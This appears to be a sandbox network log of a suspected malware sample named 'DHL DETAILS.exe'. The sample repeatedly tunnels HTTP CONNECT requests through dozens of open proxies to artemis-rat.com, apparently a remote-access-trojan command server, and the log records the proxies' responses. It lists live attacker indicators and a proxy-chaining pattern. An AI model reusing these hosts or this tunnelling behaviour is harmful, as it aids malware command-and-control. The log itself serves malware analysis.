Mar 9, 2024 13:14:20.521869898 CET	536	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:20 GMT Server: Apache Strict-Transport-Security: max-age=63072000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Length: 663 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to co
Mar 9, 2024 13:14:20.521879911 CET	429	IN	Data Raw: 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 72 6f 6f 74 40 73 65 72 76 Data Ascii: mpleteyour request.</p><p>Please contact the server administrator at root@server.sena.cl to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
731	192.168.2.5	52204	51.210.223.9	3000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.204931974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
732	192.168.2.5	52473	185.238.228.67	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.205563068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.360583067 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
733	192.168.2.5	52483	104.23.128.174	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.205825090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.360881090 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
734	192.168.2.5	52364	201.174.239.28	4153	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.206161022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
735	192.168.2.5	52489	104.20.178.166	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.206355095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.361043930 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
736	192.168.2.5	52224	161.97.173.42	52463	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.206552029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.848678112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.833417892 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.724040985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.333233118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:26.020694971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.646261930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.833729029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
737	192.168.2.5	52498	203.24.108.194	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.206617117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.363168001 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
738	192.168.2.5	52397	31.204.28.136	5432	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.206948042 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.411521912 CET	308	IN	HTTP/1.1 407 Proxy Authentication Required Server: FaaS v1.3-20220203-7fa38bd5af Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 65 Proxy-Authenticate: Basic realm="Proxy" Connection: close Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64 Data Ascii: HTTP authorization error: ip auth failed, no credentials provided

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
739	192.168.2.5	52500	104.17.166.210	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.207350016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.364064932 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
740	192.168.2.5	52217	20.37.207.8	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.208914995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.516810894 CET	72	IN	HTTP/1.1 200 Connection established Proxy-Agent: Fortinet-Proxy/1.0
Mar 9, 2024 13:14:31.352876902 CET	72	IN	HTTP/1.1 200 Connection established Proxy-Agent: Fortinet-Proxy/1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
741	192.168.2.5	52248	51.89.173.40	23313	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.216548920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.895571947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.036478043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.036616087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
742	192.168.2.5	52394	38.162.13.126	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.217344999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.647043943 CET	111	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="" Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 Data Ascii: Proxy Authentication Required

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
743	192.168.2.5	51539	82.113.157.122	31280	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.217859983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.950242043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.781300068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
744	192.168.2.5	51548	20.0.91.150	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.220485926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.360521078 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
745	192.168.2.5	52416	38.54.95.19	8060	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.224204063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.444245100 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
746	192.168.2.5	52446	34.135.166.24	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.227761030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
747	192.168.2.5	52242	65.21.255.197	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.228094101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.551858902 CET	75	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Length: 0
Mar 9, 2024 13:14:15.877722979 CET	103	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
748	192.168.2.5	52297	92.205.28.245	8560	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.228096008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.950340986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.974009037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
749	192.168.2.5	52222	8.142.3.145	3306	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.229228973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.911226034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
750	192.168.2.5	52333	13.38.176.104	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.234024048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.530936956 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:15 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
751	192.168.2.5	51981	119.39.68.105	2323	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.235954046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.226620913 CET	39	IN	HTTP/1.0 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
752	192.168.2.5	52345	93.190.141.102	47851	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.237607956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.535159111 CET	226	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Length: 101 Content-Type: text/plain; charset=utf-8 Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
753	192.168.2.5	52244	83.243.92.154	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.241287947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
754	192.168.2.5	52325	46.17.63.166	10000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.243869066 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.544855118 CET	339	IN	HTTP/1.1 403 Forbidden Server: squid/4.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html;charset=utf-8 Content-Length: 5 X-Squid-Error: TCP_RESET 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from proxy.wakoopa.com Via: 1.1 proxy.wakoopa.com (squid/4.7) Connection: keep-alive Data Raw: 72 65 73 65 74 Data Ascii: reset

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
755	192.168.2.5	52366	184.185.2.12	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.245342970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
756	192.168.2.5	52223	120.33.126.200	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
